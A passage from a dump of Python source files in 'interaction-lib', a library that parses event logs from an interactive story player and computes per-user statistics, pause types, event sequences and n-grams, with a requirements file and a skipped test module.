pauses_include_events,\n pauses_exclude_events = pauses_exclude_events, \n verbose = verbose\n )\n self.event_statistics(\n interaction_events = interaction_events,\n include_link_choices = include_link_choices,\n include_user_set_variables = include_user_set_variables,\n verbose = verbose\n )\n \n for user in self._users: # build up the statistics dictionary\n self._statistics[user] = {}\n self._statistics[user].update(self._time_statistics[user])\n self._statistics[user].update(self._pause_statistics[user])\n self._statistics[user].update(self._event_statistics[user])\n\n return self._statistics\n else: # else, the statistics have been previously calculated\n if user_id is not None: # if it's for a specific user\n if not isinstance(user_id, str): \n raise TypeError('User ID should be a string: {0} ({1})'.format(user_id, type(user_id)))\n \n if user_id not in self.data.keys():\n raise ValueError('Invalid User ID: {0} ({1})'.format(user_id, type(user_id)))\n\n return self._statistics[user_id]\n\n return self._statistics\n\n" }, { "alpha_fraction": 0.5946372151374817, "alphanum_fraction": 0.602523684501648, "avg_line_length": 32.342105865478516, "blob_id": "307f0b68d559ec4381b814a2c668d94aaaa0b1c6", "content_id": "8338e1f0ecc201d7530c11cd59029ec9b71bf4f0", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 1268, "license_type": "no_license", "max_line_length": 83, "num_lines": 38, "path": "/interlib/util/helpers.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\"\nHelper functions for processing the data\n\"\"\"\nfrom datetime import datetime as dt\nimport json\n\n############################\n# Common statistical tasks\n############################\n\ndef get_hidden_time(hidden_ts, current_index, events):\n if (current_index + 1) == len(events): return 0\n\n visible_ts = None\n if (events[current_index + 1]['action_name'] == 'BROWSER_VISIBILITY_CHANGE' and\n events[current_index + 1]['action_name'] == 'visible'):\n visible_ts = events[current_index + 1]['timestamp']\n else:\n for f_idx, f_event in enumerate(events[current_index:]):\n if (f_event['action_name'] == 'BROWSER_VISIBILITY_CHANGE' and \n f_event['data']['romper_to_state'] == 'visible'):\n visible_ts = f_event['timestamp']\n break\n\n if visible_ts:\n return (visible_ts - hidden_ts).total_seconds()\n return 0 # couldn't find the issue\n\ndef missing_hidden_visibility_change(visbile_ts, current_index, events):\n # nothing we can do at the start of the list\n if current_index == 0: return 0 \n\n pseudo_hidden_ts = events[current_index - 1]['timestamp']\n \n return (visbile_ts - pseudo_hidden_ts).total_seconds()\n\ndef safe_division(n, d):\n return n / d if d else 0\n\n" }, { "alpha_fraction": 0.631147563457489, "alphanum_fraction": 0.631147563457489, "avg_line_length": 14.375, "blob_id": "d2eb070ba9f8c0ad338316276adb73c4f840c350", "content_id": "3103eb6bfba4d315b2a50d8f442b5a5ec1159a54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 122, "license_type": "no_license", "max_line_length": 45, "num_lines": 8, "path": "/interlib/util/__init__.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\" \nUtility functions and helpers for the library\n\"\"\"\n\n# ----- Imports ------\n\nfrom .helpers import *\nfrom .data import *" }, { "alpha_fraction": 0.5265215039253235, "alphanum_fraction": 0.5287548899650574, "avg_line_length": 38.27631759643555, "blob_id": "71049b1a812a95e80e9330d8c6bf8d4617305da2", "content_id": "ba3b5a0cc5ccd18b0f2a77faebf4a2f01d6b6afc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8955, "license_type": "no_license", "max_line_length": 97, "num_lines": 228, "path": "/interlib/preprocessing/sequences.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\n\nfrom .base import BaseExtractor\nfrom ._event_handler import EventHandler\n\nfrom datetime import datetime as dt\nfrom collections import Counter, defaultdict\nfrom typing import Optional, Union, List, Set, Dict, Counter\nfrom joblib import Parallel, delayed\nfrom nltk import ngrams\n\n\nclass SequenceError(Exception):\n \"\"\" \n Custom error to raise when the sequences do not exist\n but the user is requesting an action to be performed\n using the sequences.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\nclass Sequences(BaseExtractor):\n\n def __init__(self, user_event_dict, completion_point=None, n_jobs=-1):\n super().__init__(user_event_dict, completion_point=completion_point, n_jobs=n_jobs)\n\n self._sequences = {}\n\n def _compress_events(self, sequence: List[str], compress_event: str = 'NEC') -> List[str]:\n \"\"\" \"\"\"\n if len(sequence) == 
0:\n return sequence\n\n updated_sequence = []\n just_seen_event = False\n for indx, event in enumerate(sequence): # for each event in the sequence\n\n # if the event is the event to be compressed and we've not just seen it\n if event == compress_event and not just_seen_event:\n count = 1\n for other_event in sequence[(indx + 1): ]: # scan forward to count\n if other_event == compress_event: count += 1\n else: break\n \n just_seen_event = True # indicate that we've just seen it\n updated_sequence.append(event + '_' + str(count)) # event_count format\n \n # if we've not just seen the event, the append the next one\n if not just_seen_event:\n updated_sequence.append(event)\n \n # if we have just seen the event and the event isn't the compress event\n if just_seen_event and event != compress_event:\n updated_sequence.append(event)\n just_seen_event = False # set just seen to false\n \n return updated_sequence\n\n def _categorize_sequence(self, sequence: List[str], categories: Dict[str, str]) -> List[str]:\n \"\"\" TODO \"\"\"\n pass\n\n def get_sequences(\n self,\n interaction_events: Set[str],\n aliases: Dict[str, str],\n user_id: Optional[str] = None,\n compress: Optional[bool] = True,\n compress_event: Optional[str] = None,\n categories: Optional[Dict[str, str]] = None,\n time_threshold: Optional[Union[float, int]] = None,\n verbose: Optional[int] = 0\n ) -> Dict[str, Dict]:\n \"\"\" \n \n :params time_threshold: upper limit in seconds (not minutes!)\n \"\"\"\n def _seq(user_chunk, data_chunk, e_handler):\n user_dict = {user: [] for user in user_chunk}\n for d in data_chunk: user_dict[d['user']].append(d)\n\n results = {user: [] for user in user_chunk}\n nec = 'NARRATIVE_ELEMENT_CHANGE'\n\n for user, events in user_dict.items():\n if len(events) < 1: # if there is no events, just continue\n continue\n \n if time_threshold:\n first_event_ts = None\n\n previous_timestamp = None \n for idx, event in enumerate(events): # for each event in the users events\n if idx == 0: # if it's the first timestamp\n first_event_ts = event['timestamp']\n \n # if the event is one that should be captured\n if event['action_name'] in interaction_events:\n \n # pauses are tracked between the events that are being tracked and\n # that are to be included in the sequence\n if previous_timestamp == None: \n previous_timestamp = event['timestamp']\n \n pause_type, _ = self._type_of_pause(\n previous_timestamp, event['timestamp']\n )\n if pause_type != 0:\n results[user].append(pause_type)\n previous_timestamp = event['timestamp']\n\n results[user].append(e_handler.process_event(event))\n \n if (time_threshold and \n (event['timestamp'] - first_event_ts).total_seconds() > time_threshold):\n # if we've hit the threshold provided\n break\n \n if compress:\n results[user] = self._compress_events(results[user], compress_event)\n \n if categories:\n results[user] = self._categorize_sequence(results[user], categories)\n\n e_handler = e_handler.reset()\n\n return results\n\n # ERROR CHECKING\n if not isinstance(interaction_events, set):\n raise TypeError(\n f\"interaction_events should be a set, current type: {type(interaction_events)}\"\n )\n \n if not isinstance(aliases, dict):\n raise TypeError(f\"aliases should be a dict, current type: {type(aliases)}\")\n\n # check that all interaction events are in the aliases\n if not set(interaction_events) == set(aliases.keys()):\n raise ValueError('interaction events and aliases keys should be the same')\n\n if not self._sequences:\n if user_id is not None: \n if not 
isinstance(user_id, str):\n                    raise TypeError('user_id should be a string: {0} (type: {1})'.format(\n                        user_id, type(user_id)\n                    ))\n\n                if user_id not in self._users:\n                    raise ValueError('Invalid user_id: {0}'.format(user_id))\n\n                e_handler = EventHandler(aliases)\n                return _seq(\n                    user_chunk = [user_id], \n                    data_chunk = self.data[user_id],\n                    e_handler = e_handler)[user_id]\n\n            self._sequences = {user: [] for user in self._users}\n            parallel = Parallel(n_jobs = self._num_cpu, verbose = verbose)\n\n            e_handler = EventHandler(aliases)\n\n            # runs the _seq function in parallel\n            res = parallel(delayed(_seq) (u, e, e_handler) for u, e in self._split_users())\n\n            # unpack the results and add them to the sequences dict\n            for r in res:\n                for u, s in r.items():\n                    self._sequences[u] = s\n\n            return self._sequences\n        else:\n            if user_id is not None:\n                if not isinstance(user_id, str):\n                    raise TypeError('user_id should be a string: {0} (type: {1})'.format(\n                        user_id, type(user_id)\n                    ))\n\n                if user_id not in self._users:\n                    raise ValueError('Invalid user_id: {0}'.format(user_id))\n\n                return self._sequences[user_id]\n            return self._sequences\n\n    def get_ngrams(\n        self, \n        n: Optional[int] = 3,\n        counter: Optional[bool] = False, \n    ) -> Union[List, Counter]:\n        \"\"\" \n        - if get_sequences hasn't been called, then we propagate an error.\n        - should provide the option to say what the N is\n        - Return just the ngrams or a counter object\n        \"\"\"\n        if not self._sequences:\n            raise SequenceError(\n                'Sequences have not been extracted, call '\n                'get_sequences beforehand.'\n            )\n\n        if not isinstance(n, int):\n            raise TypeError('n should be an int: {0} (type: {1})'.format(n, type(n)))\n\n        if not isinstance(counter, bool):\n            raise TypeError(\n                'counter should be a bool: {0} (type: {1})'.format(counter, type(counter)))\n\n        # Get the n-grams for all of the users\n        ngrams_dict = defaultdict(list) # {user_id -> [n_grams, ...], ...}\n        for user, sequence in self._sequences.items():\n            calculate_ngrams = ngrams(sequence, n) # get the ngrams for this sequence\n            for each_gram in calculate_ngrams:\n                ngrams_dict[user].append(each_gram) # append each gram\n\n        counts = Counter() # Count the n-grams (across all n-grams)\n        user_counts = defaultdict(Counter) # Count the n-grams (for each user)\n        for user, all_grams in ngrams_dict.items():\n            # update the counter with the current list of n-grams\n            counts.update(all_grams)\n            user_counts[user].update(all_grams)\n\n        if counter:\n            return ngrams_dict, counts, user_counts\n        else:\n            return ngrams_dict\n" }, { "alpha_fraction": 0.5930683612823486, "alphanum_fraction": 0.5950934290885925, "avg_line_length": 38.07466125488281, "blob_id": "9d1e55cc673ab1f0640885a92e40d5ca27df0fbc8", "content_id": "aa8c99924d7b317a447b5c98a121d92d5c0304c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17283, "license_type": "no_license", "max_line_length": 99, "num_lines": 442, "path": "/interlib/util/data.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\" \nUtility functions for processing raw data.\n\"\"\"\n\nfrom typing import (\n    Optional,\n    Union, \n    List,\n    Dict,\n    Set\n)\nfrom datetime import datetime as dt\n\nimport json, os\nimport numpy as np\nimport pandas as pd \n\n\ndef parse_raw_data(\n    raw_data: List[Dict], \n    datetime_format: str = \"%Y-%m-%d %H:%M:%S.%f\", \n    include_narrative_element_id: bool = False\n) -> List[Dict]:\n    \"\"\"\n    Given a list of raw data, parse it into the format that is used\n    to represent user events.\n\n    
:params raw_data: a list of events (dictionaries)\n :params datetime_format: the format to parse the timestamp string\n :params include_narrative_element_id: do you want to include this field\n :returns: data parsed as a list of events\n \"\"\"\n parsed_data = []\n\n for datum in raw_data:\n # parse the message data\n if 'message' in datum.keys():\n parse_message = json.loads(datum['message'])\n else:\n parse_message = json.loads(datum['data'])\n nested_data = {}\n for key in parse_message:\n nested_data[key] = parse_message[key]\n\n # parse the timestamp into a datetime object\n timestamp = datum['timestamp']\n if len(timestamp) < 24: timestamp = timestamp + '.000'\n timestamp = dt.strptime(timestamp[:23], datetime_format)\n\n p_data = {\n 'id': datum['id'], 'user': datum['userid'],\n 'timestamp': timestamp, 'action_type': datum['item'],\n 'action_name': datum['action'], 'data': nested_data\n }\n\n if include_narrative_element_id:\n p_data.update({'narrative_element': datum['narrative_element']})\n\n parsed_data.append(p_data)\n\n return parsed_data\n\n\ndef parse_timestamp(\n data: List[Dict], \n datetime_format: str = \"%Y-%m-%d %H:%M:%S.%f\"\n) -> List[Dict]:\n \"\"\"\n A function to parse the timestamp field into datetime objects\n\n :params data: un-parsed data, a list of dictionaries\n :params datetime_format: the format for the datetime object\n :returns: updated data parameter\n \"\"\"\n for event in data:\n timestamp = event['timestamp']\n if len(timestamp) < 24: timestamp = timestamp + '.000'\n event.update(\n (k , dt.strptime(timestamp[:23], datetime_format))\n for k, v in event.items() if k == 'timestamp'\n )\n return data\n\n\ndef _get_users_clicked_start_button(events):\n \"\"\"\n Fetches the set of users that have clicked the start\n button. 
This functionality is needed as the users that\n    haven't clicked the start button haven't agreed to their\n    data being processed.\n\n    :params events: all captured events\n    :returns: a set of users that clicked the start button.\n    \"\"\"\n    return set([\n        event['user'] for event in events if event['action_name'] == 'START_BUTTON_CLICKED'\n    ])\n\ndef to_dict(\n    path: str, \n    split: Optional[Union[bool, int]] = None,\n    datetime_format: Optional[str] = \"%Y-%m-%d %H:%M:%S.%f\",\n    include_narrative_element_id: Optional[bool] = False,\n    sort: Optional[bool] = True,\n    users_to_include: Optional[Set[str]] = None,\n    start_button_filter: Optional[bool] = True,\n    already_parsed: Optional[bool] = False\n) -> Union[Dict[str, List], List[Dict[str, List]]]:\n    \"\"\"\n    Utility function to convert a raw dataset (in a json export from DB\n    format) to the format that is internally used: {user -> events}\n\n    :params path: the path to the data file (json)\n    :params split: whether the data should be split (into 2, default) or\n        the number of splits requested\n    :params datetime_format: the format for the timestamp, compatible with\n        datetime\n    :params include_narrative_element_id: whether to include narrative element\n        changes\n    :params sort: whether or not to sort the data by the timestamp.\n    :params users_to_include: a subset of user_ids that you want to extract the data for\n    :params start_button_filter: only include users that have clicked the Start button, \n        indicating that they have accepted the data collection policy.\n    :returns: dictionary of values: {user -> events} or, if split, then\n        a list of dictionaries in [{user -> events}] format\n    \"\"\"\n    if not isinstance(path, str):\n        raise TypeError('Path is not a string: {0} ({1})'.format(path, type(path)))\n\n    if not os.path.isfile(path):\n        raise ValueError('File does not exist: {0}'.format(path))\n\n    if split and not isinstance(split, (bool, int)):\n        raise TypeError('Split must be a bool (uses default split of 2) or int '\n            '(the number of splits): {0} ({1})'.format(split, type(split)))\n\n    if not isinstance(include_narrative_element_id, bool):\n        raise TypeError('include_narrative_element_id is not a bool: {0} ({1})'.format(\n            include_narrative_element_id, type(include_narrative_element_id) \n        ))\n\n    if not isinstance(sort, bool):\n        raise TypeError('sort is not a bool: {0} ({1})'.format(sort, type(sort)))\n\n    with open(path, 'r') as in_file: # read in the data provided\n        if already_parsed:\n            data = parse_timestamp(json.load(in_file), datetime_format)\n        else:\n            data = parse_raw_data( # parse into our internal format at the same time\n                json.load(in_file), \n                datetime_format, \n                include_narrative_element_id\n            )\n\n    if start_button_filter:\n        clicked_start_button = _get_users_clicked_start_button(data)\n    else:\n        # no start-button filtering: treat every user as having consented\n        clicked_start_button = {event['user'] for event in data}\n\n    if split:\n        if isinstance(split, bool): # if it's a bool\n            split = 2 # then just use 2 as the default\n\n        # create a list of all user ids\n        if users_to_include: # if we're looking for a subset\n            user_ids = []\n            for event in data:\n                if (event['user'] in users_to_include and event['user'] in clicked_start_button):\n                    user_ids.append(event['user'])\n        else: # otherwise, it's everyone\n            user_ids = [event['user'] for event in data]\n\n        # partition the user id's into the split value\n        split_users = np.array_split(user_ids, split)\n        split_list = []\n        for item in split_users:\n            split_list.append(set(item))\n\n        main_list = []\n        for part in split_list:\n            segment = []\n\n            for event in data:\n                if event['user'] in part:\n                    segment.append(event)\n\n            
main_list.append(segment)\n\n # transform into the {user -> events} format\n events = []\n for d in main_list:\n # get all of the users in the segment and build a user event dict\n user_ids = {event['user'] for event in d}\n user_events = {id: [] for id in user_ids}\n\n for event in d: # for each event\n if event['user'] in user_ids: # if that user is in this segment\n user_events[event['user']].append(event)\n \n if sort: # if sort, then sort by timestamp\n for user in user_events.copy().keys():\n user_events[user] = sorted(user_events[user], key = lambda x: x['timestamp'])\n\n\n # for user, event in user_events.copy().items():\n # user_events[user] = sorted(user_events[user], key = lambda x: x['timestamp'])\n \n # build the returned list\n events.append(user_events)\n\n return events\n else:\n if users_to_include:\n user_ids = {\n event['user'] for event in data if event['user'] in users_to_include\n }\n else:\n user_ids = {event['user'] for event in data}\n\n if start_button_filter:\n clicked_start_button = _get_users_clicked_start_button(data)\n\n # build up the user events dict {user -> [events]}\n user_events = {id: [] for id in user_ids}\n\n if start_button_filter:\n for event in data:\n if (event['user'] in user_ids and event['user'] in clicked_start_button):\n user_events[event['user']].append(event)\n else:\n for event in data:\n if event['user'] in user_ids:\n user_events[event['user']].append(event)\n \n if sort:\n # sort the events by the timestamp\n for user, events in user_events.copy().items():\n user_events[user] = sorted(events, key = lambda x: x['timestamp'])\n\n return user_events\n\ndef to_dataframe(\n result_dictionary: Dict[str, Dict], \n key_name: Optional[str] = 'user'\n) -> pd.DataFrame:\n \"\"\" \n Given a dictionary of results, from the statistics package,\n convert it into a pandas dataframe format.\n\n :params result_dictionary: dictionary created as a result of calculating statistics\n :params key_name: what the index should be renamed to when the dataframe is reset\n :returns: pandas DataFrame\n \"\"\"\n if not isinstance(result_dictionary, dict):\n raise TypeError(f\"result_dictionary should be a dictionary and be the output from the \" +\n f\"Statistics package, current type: {type(result_dictionary)}\")\n\n return pd.DataFrame.from_dict(\n result_dictionary, orient = 'index'\n ).reset_index().rename(columns = {'index': key_name})\n\n# TODO function to get the set of users that reached a particular\n# point in the story (check seen_introduction in stats_time_thresholds.py)\n\ndef reached_point(\n user_events: Dict[str, List],\n point: str,\n filter: Optional[bool] = False\n) -> Union[Set[str], Dict[str, List]]:\n \"\"\"\n From a dictionary (user_id mapped to a list of events), find\n which users have passed through a particular point in the experience.\n\n The function also provides the ability to filter out users \n that haven't passed through this point. 
This will return an updated\n version of the user_events parameter\n\n :params user_events:\n :params point:\n :params filter:\n :returns:\n \"\"\"\n if not isinstance(user_events, dict): \n raise ValueError(f\"user_events must be a dictionary (current type: {type(user_events)}\")\n elif len(user_events) == 0:\n raise ValueError(f\"user_events is empty (len = {len(user_events)}\")\n elif not all(isinstance(l, list) for l in user_events.values()):\n raise ValueError(f\"the values in user_events should be lists of events\")\n\n users_to_remove = set([])\n for user, events in user_events.items():\n # collect the narrative element changes into a list\n ne_changes = [nec for nec in events if nec['action_type'] == 'STORY_NAVIGATION']\n\n # indicators for: moving to the node and out of the node\n to_state = False \n from_state = False \n\n for nec in ne_changes:\n if nec['data']['romper_to_state'] == point:\n to_state = True \n if nec['data']['romper_from_state'] == point:\n from_state = True \n \n # if either are false, then the user didn't pass through this point\n if not to_state or not from_state:\n users_to_remove.add(user)\n\n # if we're asked to filter users out\n if filter:\n # then we'll remove these users from a copy of the events (avoids mutating the original)\n user_events_copy = user_events.copy()\n for user in users_to_remove:\n user_events_copy.pop(user, None)\n \n return user_events_copy\n \n # otherwise, we need to get the difference and return the users that passed through.\n return set(user_events.keys()) - users_to_remove\n\ndef events_between_two_points(\n user_events: Dict[str, List], \n start_point: str, \n end_point: str, \n filter: bool = False,\n using_representation_id: bool = False\n) -> Dict[str, List]:\n \"\"\"\n Given all of the user events, return a filtered set of user events that were\n triggered between two points. 
This is useful for extracting events that occur\n during the substories of Click.\n\n TODO: implement the option to use representation ids rather than romper_to_states\n\n :params user_events: dictionary of user events ({user -> [events]})\n :params start_point: romper_to_state value\n :params end_point: romper_to_state value\n :params filter: remove users with empty event lists (default = False)\n :params using_representation_id: in newer experiences, each node is given a unique\n representation id, if you're passing ids to the start_point and end_point parameters\n then you need to set this to true (default = False)\n :returns: dictionary of user events\n \"\"\"\n if not isinstance(user_events, dict): \n raise ValueError(f\"user_events must be a dictionary (current type: {type(user_events)}\")\n elif len(user_events) == 0:\n raise ValueError(f\"user_events is empty (len = {len(user_events)}\")\n elif not all(isinstance(l, list) for l in user_events.values()):\n raise ValueError(f\"the values in user_events should be lists of events\")\n\n # add all users to dictionary with empty lists\n events_subset = {user: [] for user in user_events.keys()}\n\n for user, events in user_events.items():\n # find the starting point index\n start_idx = None \n for idx, event in enumerate(events):\n if (event['action_type'] == 'STORY_NAVIGATION' and \n event['data']['romper_to_state'] == start_point and \n not using_representation_id\n ):\n start_idx = idx \n break\n elif (event['action_type'] == 'STORY_NAVIGATION' and \n using_representation_id and \n event['data']['current_narrative_element'] == start_point\n ):\n start_idx = idx \n break \n \n # iterate from that index, adding events until you reach the end\n if start_idx is not None:\n for idx, event in enumerate(events[start_idx:]):\n # is the current event the one where they move to the end point?\n if (event['action_type'] == 'STORY_NAVIGATION' and \n event['data']['romper_to_state'] == end_point and \n not using_representation_id\n ):\n events_subset[user].append(event) # add the event\n break # exit, we've reached the endpoint\n elif (event['action_type'] == 'STORY_NAVIGATION' and \n using_representation_id and \n event['data']['current_narrative_element'] == end_point\n ):\n events_subset[user].append(event) # add the event \n break # exit, we've reached the end point\n else:\n events_subset[user].append(event)\n \n if filter: # if we're asked to remove empty lists\n return {\n user: events \n for user, events in events_subset.items() # for all users -> events\n if events # if the list contains some events\n }\n else:\n return events_subset\n\ndef events_to_threshold(\n user_events: Dict[str, List],\n threshold: Union[int, float],\n) -> Dict[str, List]:\n \"\"\"\n Given a dictionary of user events, filter the events down to\n those that happen up until the threshold. 
For example, if the\n threshold is set to 300 (indicating 5 minutes), then the function\n returns a dictionary containing the users' events up until the 5 minute\n threshold.\n\n There is an assumption that all of the users in the dictionary have been\n pre-filtered to only include those that got up to, or past, the threshold.\n\n :params user_events: dictionary of user events ({user -> [events]})\n :params threshold: the time threshold, in seconds\n :returns: dictionary of user events, truncated at the threshold\n \"\"\"\n if not isinstance(user_events, dict): \n raise ValueError(f\"user_events must be a dictionary (current type: {type(user_events)})\")\n elif len(user_events) == 0:\n raise ValueError(f\"user_events is empty (len = {len(user_events)})\")\n elif not all(isinstance(l, list) for l in user_events.values()):\n raise ValueError(\"the values in user_events should be lists of events\")\n\n filtered_user_events = {}\n for user, events in user_events.items():\n events_threshold = []\n first_event_timestamp = None \n \n for event in events:\n if first_event_timestamp is None:\n first_event_timestamp = event['timestamp']\n events_threshold.append(event)\n continue \n \n # if the difference between the first and current event is greater than the threshold\n if (event['timestamp'] - first_event_timestamp).total_seconds() > threshold:\n events_threshold.append(event)\n break # exit as we've met the threshold\n else:\n events_threshold.append(event)\n\n filtered_user_events[user] = events_threshold\n\n return filtered_user_events \n" }, { "alpha_fraction": 0.45390069484710693, "alphanum_fraction": 0.673758864402771, "avg_line_length": 15.703703880310059, "blob_id": "3fa40b3549b865c6cae0665db467d01fd75ebbe4", "content_id": "3ba1c01fe60c9acbf8829be2a32cda023cb98eaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 423, "license_type": "no_license", "max_line_length": 25, "num_lines": 27, "path": "/requirements.txt", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "astroid==2.3.3\nattrs==19.3.0\ncertifi==2020.4.5.1\ncoverage==5.1\nimportlib-metadata==1.6.0\nisort==4.3.21\njoblib==0.14.1\nlazy-object-proxy==1.4.3\nmccabe==0.6.1\nmore-itertools==8.2.0\nnumpy==1.18.1\npackaging==20.3\npandas==1.0.3\npluggy==0.13.1\npy==1.8.1\npylint==2.4.4\npyparsing==2.4.7\npytest==5.4.1\npython-dateutil==2.8.1\npytz==2019.3\nscipy==1.4.1\nsix==1.14.0\ntyped-ast==1.4.1\nwcwidth==0.1.9\nwrapt==1.12.1\nzipp==3.1.0\nnltk==3.4.5" }, { "alpha_fraction": 0.6354323625564575, "alphanum_fraction": 0.64537513256073, "avg_line_length": 34.69892501831055, "blob_id": "c247dc92dcb4bb568a6bcc219530e2d9757a3849", "content_id": "477902bf3e844a02f598f1e00bb909b6bfc191ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3319, "license_type": "no_license", "max_line_length": 76, "num_lines": 93, "path": "/tests/test_preprocessing/test_slices.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "import pytest \n\npytestmark = pytest.mark.skip(\"all tests still WIP\")\n\nimport pickle, json, datetime \nimport numpy as np \nimport pandas as pd\nimport itertools\n\nfrom interlib.preprocessing import StatisticalSlices\n\n# Fixtures\n@pytest.fixture\ndef test_data():\n with open('tests/test_data_files/test_data.p', 'rb') as data_in:\n data = pickle.load(data_in)\n return data\n\n@pytest.fixture\ndef window_data():\n return [\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n 
['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'BUTTONS_DEACTIVATED']\n ]\n\[email protected]\ndef interaction_events():\n return { # set of user actions we consider\n 'PLAY_PAUSE_BUTTON_CLICKED', 'BACK_BUTTON_CLICKED', \n 'FULLSCREEN_BUTTON_CLICKED','NEXT_BUTTON_CLICKED', \n 'SUBTITLES_BUTTON_CLICKED', 'VOLUME_CHANGE',\n 'VIDEO_SCRUBBED', 'SEEK_BACKWARD_BUTTON_CLICKED', \n 'SEEK_FORWARD_BUTTON_CLICKED', 'VOLUME_MUTE_TOGGLED', \n 'VARIABLE_PANEL_NEXT_CLICKED', 'VARIABLE_PANEL_BACK_CLICKED',\n 'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE',\n 'LINK_CHOICE_CLICKED', 'USER_SET_VARIABLE'\n }\n\[email protected]\ndef stats_ground_truth():\n with open('tests/test_data_files/test_statistics.json', 'r') as data_in:\n data = json.load(data_in)\n return data\n\ndef test_splitting_array(test_data, window_data, interaction_events):\n ss = StatisticalSlices(test_data, interaction_events)\n for user, events in test_data.items():\n nec_indexes = []\n for idx, event in enumerate(events):\n if event['action_name'] == 'NARRATIVE_ELEMENT_CHANGE':\n nec_indexes.append(idx)\n \n assert ss._get_indices(events) == nec_indexes\n \n\ndef test_get_slices(test_data, interaction_events, stats_ground_truth):\n ss = StatisticalSlices(test_data, interaction_events)\n ss_slices = ss.get_slices()\n\n total_session_length = 0\n total_total_events = 0\n for val in ss_slices:\n if val['user'] == '959c1a91-8b0f-4178-bc59-70499353204f':\n total_session_length += val['session_length']\n total_total_events += val['total_events']\n\n for user, gt in stats_ground_truth.items():\n user_spec = [s for s in ss_slices if s['user'] == user]\n sess_len, hidden_time = 0, 0\n for item in user_spec:\n sess_len += item['session_length']\n hidden_time += item['hidden_time']\n \n assert gt['session_length'] == pytest.approx(sess_len, 0.1)\n assert gt['hidden_time'] == pytest.approx(hidden_time, 0.1)\n\ndef test_get_slices_df(test_data, interaction_events):\n ss = StatisticalSlices(test_data, interaction_events)\n ss_slices = ss.get_slices(as_df = True)\n\n print(ss_slices)\n # dfs = [\n # pd.DataFrame(val)\n # for val in ss_slices\n # ]\n # print(pd.concat(dfs))" }, { "alpha_fraction": 0.5634040236473083, "alphanum_fraction": 0.5703953504562378, "avg_line_length": 35.07826232910156, "blob_id": "a2e09180f32f04c481f1aff3169cd915df531168", "content_id": "18e78ad0238644039d5e0c857c976fb9a9f52c0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4148, "license_type": "no_license", "max_line_length": 97, "num_lines": 115, "path": "/interlib/preprocessing/base.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "from joblib import cpu_count\nfrom datetime import datetime as dt\nfrom typing import Union, Dict, Optional, List\n\nimport numpy as np\n\nfrom ..util.data import _get_users_clicked_start_button\n\nclass BaseExtractor():\n \"\"\" Base class for all of the extractors \"\"\"\n \n def __init__(\n self, \n user_event_dict: Dict[str, List], \n completion_point: Optional[str] = None, \n n_jobs: Optional[int] = -1\n ):\n if not isinstance(user_event_dict, dict):\n raise TypeError('User Event dictionary is not a dict')\n\n if len(user_event_dict) == 0:\n raise ValueError('User event 
dictionary must contain at least one user')\n\n if completion_point and not isinstance(completion_point, str):\n raise TypeError('completion_point should be a str')\n\n if not isinstance(n_jobs, int):\n raise TypeError('n_jobs should be an int')\n\n self.data = self._sort_events(user_event_dict)\n self.completion_point = completion_point\n self.n_jobs = n_jobs\n\n if self.completion_point:\n self._users_reached_completion_point, self.last_ne = self._reached_completion_point()\n else:\n self.last_ne = {user: np.nan for user in self.data.keys()}\n self._users_reached_completion_point = {user: False for user in self.data.keys()}\n\n if self.n_jobs == -1: self._num_cpu = cpu_count()\n else: self._num_cpu = n_jobs\n\n self._users = set(self.data.keys())\n self._users_split = self._split_users()\n\n def _sort_events(self, user_event_dict):\n data = {}\n for user, events in user_event_dict.items():\n data[user] = sorted(events, key = lambda x: x['timestamp'])\n return data\n\n def _split_users(self):\n \"\"\" Split the users (and their events) into one chunk per available core \"\"\"\n split_events = [[] for _ in range(0, self._num_cpu)]\n splits = np.array_split(list(self._users), self._num_cpu)\n for idx, split in enumerate(splits):\n for u in split:\n for e in self.data[u]:\n split_events[idx].append(e)\n\n return zip(splits, split_events)\n\n def _reached_completion_point(self):\n \"\"\" Determine which users reached the completion point and record the last narrative element each user saw \"\"\"\n reached_end = {}\n last_narrative_element_seen = {}\n for user, events in self.data.items():\n ne_changes = [\n change \n for change in events \n if change['action_type'] == 'STORY_NAVIGATION'\n ]\n\n if len(ne_changes) > 0:\n last_narrative_element_seen[user] = ne_changes[-1]['data']['romper_to_state']\n\n for ne_change in ne_changes:\n if ne_change['data']['romper_to_state'] == self.completion_point:\n reached_end[user] = True \n break\n \n if user not in reached_end.keys(): reached_end[user] = False\n\n return reached_end, last_narrative_element_seen\n\n def _type_of_pause(\n self, \n timestamp: dt, \n next_timestamp: dt\n ) -> Union[str, int]:\n \"\"\" \n Determine the type of pause that has happened based on\n 